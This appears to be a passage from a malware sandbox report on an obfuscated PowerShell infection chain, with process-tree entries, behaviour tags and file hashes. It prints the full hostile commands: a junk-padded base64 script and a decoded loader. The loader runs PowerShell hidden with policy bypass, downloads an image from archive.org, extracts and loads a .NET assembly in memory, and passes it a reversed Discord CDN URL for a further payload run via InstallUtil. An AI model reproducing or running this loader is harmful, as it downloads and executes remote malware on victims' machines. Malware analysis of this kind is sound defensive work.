⍃ ⨞ ❄cwBl⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄N⼞ ⋄ ⍃ ⨞ ❄BD⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄bQBt⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄Ck⼞ ⋄ ⍃ ⨞ ❄Ow⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄bwBh⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄ZQBk⼞ ⋄ ⍃ ⨞ ❄EE⼞ ⋄ ⍃ ⨞ ❄cwBz⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄bQBi⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄eQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄D0⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄Bb⼞ ⋄ ⍃ ⨞ ❄FM⼞ ⋄ ⍃ ⨞ ❄eQBz⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄ZQBt⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄UgBl⼞ ⋄ ⍃ ⨞ ❄GY⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bp⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄bg⼞ ⋄ ⍃ ⨞ ❄u⼞ ⋄ ⍃ ⨞ ❄EE⼞ ⋄ ⍃ ⨞ ❄cwBz⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄bQBi⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄eQBd⼞ ⋄ ⍃ ⨞ ❄Do⼞ ⋄ ⍃ ⨞ ❄OgBM⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄YQBk⼞ ⋄ ⍃ ⨞ ❄Cg⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄Bj⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄bQBt⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄EI⼞ ⋄ ⍃ ⨞ ❄eQB0⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄cw⼞ ⋄ ⍃ ⨞ ❄p⼞ ⋄ ⍃ ⨞ ❄Ds⼞ ⋄ ⍃ ⨞ ❄J⼞ ⋄ ⍃ ⨞ ❄B0⼞ ⋄ ⍃ ⨞ ❄Hk⼞ ⋄ ⍃ ⨞ ❄c⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄PQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄Bv⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄QQBz⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄ZQBt⼞ ⋄ ⍃ ⨞ ❄GI⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄B5⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄RwBl⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄V⼞ ⋄ ⍃ ⨞ ❄B5⼞ ⋄ ⍃ ⨞ ❄H⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄ZQ⼞ ⋄ ⍃ ⨞ ❄o⼞ ⋄ ⍃ ⨞ ❄Cc⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄Bu⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄aQBi⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄SQBP⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄S⼞ ⋄ ⍃ ⨞ ❄Bv⼞ ⋄ ⍃ ⨞ ❄G0⼞ ⋄ ⍃ ⨞ ❄ZQ⼞ ⋄ ⍃ ⨞ ❄n⼞ ⋄ ⍃ ⨞ ❄Ck⼞ ⋄ ⍃ ⨞ ❄Ow⼞ ⋄ ⍃ ⨞ ❄k⼞ ⋄ ⍃ ⨞ ❄G0⼞ ⋄ ⍃ ⨞ ❄ZQB0⼞ ⋄ ⍃ ⨞ ❄Gg⼞ ⋄ ⍃ ⨞ ❄bwBk⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄PQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄B5⼞ ⋄ ⍃ ⨞ ❄H⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄ZQ⼞ ⋄ ⍃ ⨞ ❄u⼞ ⋄ ⍃ ⨞ ❄Ec⼞ ⋄ ⍃ ⨞ ❄ZQB0⼞ ⋄ ⍃ ⨞ ❄E0⼞ ⋄ ⍃ ⨞ ❄ZQB0⼞ ⋄ ⍃ ⨞ ❄Gg⼞ ⋄ ⍃ ⨞ ❄bwBk⼞ ⋄ ⍃ ⨞ ❄Cg⼞ ⋄ ⍃ ⨞ ❄JwBW⼞ ⋄ ⍃ ⨞ ❄EE⼞ ⋄ ⍃ ⨞ ❄SQ⼞ ⋄ ⍃ ⨞ ❄n⼞ ⋄ ⍃ ⨞ ❄Ck⼞ ⋄ ⍃ ⨞ ❄LgBJ⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄dgBv⼞ ⋄ ⍃ ⨞ ❄Gs⼞ ⋄ ⍃ ⨞ ❄ZQ⼞ ⋄ ⍃ ⨞ ❄o⼞ ⋄ ⍃ ⨞ ❄CQ⼞ ⋄ ⍃ ⨞ ❄bgB1⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄s⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄WwBv⼞ ⋄ ⍃ ⨞ ❄GI⼞ ⋄ ⍃ ⨞ ❄agBl⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bb⼞ ⋄ ⍃ ⨞ ❄F0⼞ ⋄ ⍃ ⨞ ❄XQ⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄Cg⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄m⼞ ⋄ ⍃ ⨞ ❄Dk⼞ ⋄ ⍃ ⨞ ❄MQBi⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄ZgBk⼞ ⋄ ⍃ ⨞ ❄Dg⼞ ⋄ ⍃ ⨞ ❄M⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄Mg⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄Dc⼞ ⋄ ⍃ ⨞ ❄MwBk⼞ ⋄ ⍃ ⨞ ❄GY⼞ ⋄ ⍃ ⨞ ❄Yg⼞ ⋄ ⍃ ⨞ ❄1⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄Mw⼞ ⋄ ⍃ ⨞ ❄3⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄MQBi⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄Yw⼞ ⋄ ⍃ ⨞ ❄1⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄MQBj⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄NQ⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄DE⼞ ⋄ ⍃ ⨞ ❄NwBh⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄NQ⼞ ⋄ ⍃ ⨞ ❄w⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄N⼞ ⋄ ⍃ ⨞ ❄Bm⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄OQ⼞ ⋄ ⍃ ⨞ ❄3⼞ ⋄ ⍃ ⨞ ❄GI⼞ ⋄ ⍃ ⨞ ❄Ng⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄DQ⼞ ⋄ ⍃ ⨞ ❄Mw⼞ ⋄ ⍃ ⨞ ❄z⼞ ⋄ ⍃ ⨞ ❄GY⼞ ⋄ ⍃ ⨞ ❄Yw⼞ ⋄ ⍃ ⨞ ❄0⼞ ⋄ ⍃ ⨞ ❄GI⼞ ⋄ ⍃ ⨞ ❄Ng⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄NgBl⼞ ⋄ ⍃ ⨞ ❄DU⼞ ⋄ ⍃ ⨞ ❄PQBt⼞ ⋄ ⍃ ⨞ ❄Gg⼞ ⋄ ⍃ ⨞ ❄JgBj⼞ ⋄ ⍃ ⨞ ❄DE⼞ ⋄ ⍃ ⨞ ❄N⼞ ⋄ ⍃ ⨞ ❄Bj⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄Yw⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄PQBz⼞ ⋄ ⍃ ⨞ ❄Gk⼞ ⋄ ⍃ ⨞ ❄JgBj⼞ ⋄ ⍃ ⨞ ❄Dk⼞ ⋄ ⍃ ⨞ ❄NQ⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄D⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄Z⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄2⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄PQB4⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄PwB0⼞ ⋄ ⍃ ⨞ ❄Hg⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄u⼞ ⋄ ⍃ ⨞ ❄Eo⼞ ⋄ ⍃ ⨞ ❄Sg⼞ ⋄ ⍃ ⨞ ❄v⼞ ⋄ ⍃ ⨞ ❄DE⼞ ⋄ ⍃ ⨞ ❄Mw⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄Dk⼞ ⋄ ⍃ ⨞ ❄O⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄1⼞ ⋄ ⍃ ⨞ ❄DE⼞ ⋄ ⍃ ⨞ ❄MQ⼞ ⋄ ⍃ ⨞ ❄w⼞ ⋄ ⍃ ⨞ ❄Dk⼞ ⋄ ⍃ ⨞ ❄Ng⼞ ⋄ ⍃ ⨞ ❄z⼞ ⋄ ⍃ ⨞ ❄D⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄N⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄y⼞ ⋄ ⍃ ⨞ ❄Dg⼞ ⋄ ⍃ ⨞ ❄Nw⼞ ⋄ ⍃ ⨞ ❄y⼞ ⋄ ⍃ ⨞ ❄DE⼞ ⋄ ⍃ ⨞ ❄Lw⼞ ⋄ ⍃ ⨞ ❄5⼞ ⋄ ⍃ ⨞ ❄Dk⼞ ⋄ ⍃ ⨞ ❄N⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄Dc⼞ ⋄ ⍃ ⨞ ❄Mw⼞ ⋄ ⍃ ⨞ ❄0⼞ ⋄ ⍃ ⨞ ❄D⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄Ng⼞ ⋄ ⍃ ⨞ ❄z⼞ ⋄ ⍃ ⨞ ❄DY⼞ ⋄ ⍃ ⨞ ❄Ng⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄DU⼞ ⋄ ⍃ ⨞ ❄OQ⼞ ⋄ ⍃ ⨞ ❄3⼞ ⋄ ⍃ ⨞ ❄Dc⼞ ⋄ ⍃ ⨞ ❄Mg⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄C8⼞ ⋄ ⍃ ⨞ ❄cwB0⼞ ⋄ ⍃ ⨞ ❄G4⼞ ⋄ ⍃ ⨞ ❄ZQBt⼞ ⋄ ⍃ ⨞ ❄Gg⼞ ⋄ ⍃ ⨞ ❄YwBh⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bh⼞ ⋄ ⍃ ⨞ ❄C8⼞ ⋄ ⍃ ⨞ ❄bQBv⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄LgBw⼞ ⋄ ⍃ ⨞ ❄H⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄YQBk⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄bwBj⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄aQBk⼞ ⋄ ⍃ ⨞ ❄C4⼞ ⋄ ⍃ ⨞ ❄bgBk⼞ ⋄ ⍃ ⨞ ❄GM⼞ ⋄ ⍃ ⨞ ❄Lw⼞ ⋄ ⍃ ⨞ ❄v⼞ ⋄ ⍃ ⨞ ❄Do⼞ ⋄ ⍃ ⨞ ❄cwBw⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bo⼞ ⋄ ⍃ ⨞ ❄Cc⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄s⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄x⼞ ⋄ ⍃ ⨞ ❄Cc⼞ ⋄ ⍃ ⨞ ❄I⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄s⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄JwBD⼞ ⋄ ⍃ ⨞ ❄Do⼞ ⋄ ⍃ ⨞ ❄X⼞ ⋄ ⍃ ⨞ ❄BQ⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄bwBn⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄YQBt⼞ ⋄ ⍃ ⨞ ❄EQ⼞ ⋄ ⍃ ⨞ ❄YQB0⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄X⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄n⼞ ⋄ ⍃ ⨞ ❄C⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄L⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄g⼞ ⋄ ⍃ ⨞ ❄Cc⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bl⼞ ⋄ ⍃ ⨞ ❄HI⼞ ⋄ ⍃ ⨞ ❄cgBl⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄By⼞ ⋄ ⍃ ⨞ ❄GU⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄s⼞ ⋄ ⍃ ⨞ ❄Cc⼞ ⋄ ⍃ ⨞ ❄SQBu⼞ ⋄ ⍃ ⨞ ❄HM⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bh⼞ ⋄ ⍃ ⨞ ❄Gw⼞ ⋄ ⍃ ⨞ ❄b⼞ ⋄ ⍃ ⨞ ❄BV⼞ ⋄ ⍃ ⨞ ❄HQ⼞ ⋄ ⍃ ⨞ ❄aQBs⼞ ⋄ ⍃ ⨞ ❄Cc⼞ ⋄ ⍃ ⨞ ❄L⼞ ⋄ ⍃ ⨞ ❄⼞ ⋄ ⍃ ⨞ ❄n⼞ ⋄ ⍃ ⨞ ❄GQ⼞ ⋄ ⍃ ⨞ ❄ZQBz⼞ ⋄ ⍃ ⨞ ❄GE⼞ ⋄ ⍃ ⨞ ❄d⼞ ⋄ ⍃ ⨞ ❄Bp⼞ ⋄ ⍃ ⨞ ❄HY⼞ ⋄ ⍃ ⨞ ❄YQBk⼞ ⋄ ⍃ ⨞ ❄G8⼞ ⋄ ⍃ ⨞ ❄Jw⼞ ⋄ ⍃ ⨞ ❄p⼞ ⋄ ⍃ ⨞ ❄Ck⼞ ⋄ ⍃ ⨞ ❄';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('⼞ ⋄ ⍃ ⨞ ❄','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&91bcfd804a2673dfb54374d1c1b4c541cc5117ac50a4f497b66433fc4b66e6e5=mh&c14cec66=si&c9510d66=xe?txt.JJ/1319851109630428721/9941734063661597721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'terrestre','InstallUtil','desativado'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57836499241e402974ba30b17edd8a18e
SHA1310e199eadc99e8b6f26f35cd6b43ee3b2b81b33
SHA2564bcddd41deb6911c2942515b415445283982c802e62d7e415d6feee137dcd23e
SHA512870e3d8303a4178aa4898b6333c697d426f7798c01701de0550fe347b4a3c909e5ae6f53886ebb653fb6b6923ec3b7f15fb0e6e0d64ac45bb22fac6d9fd1e25c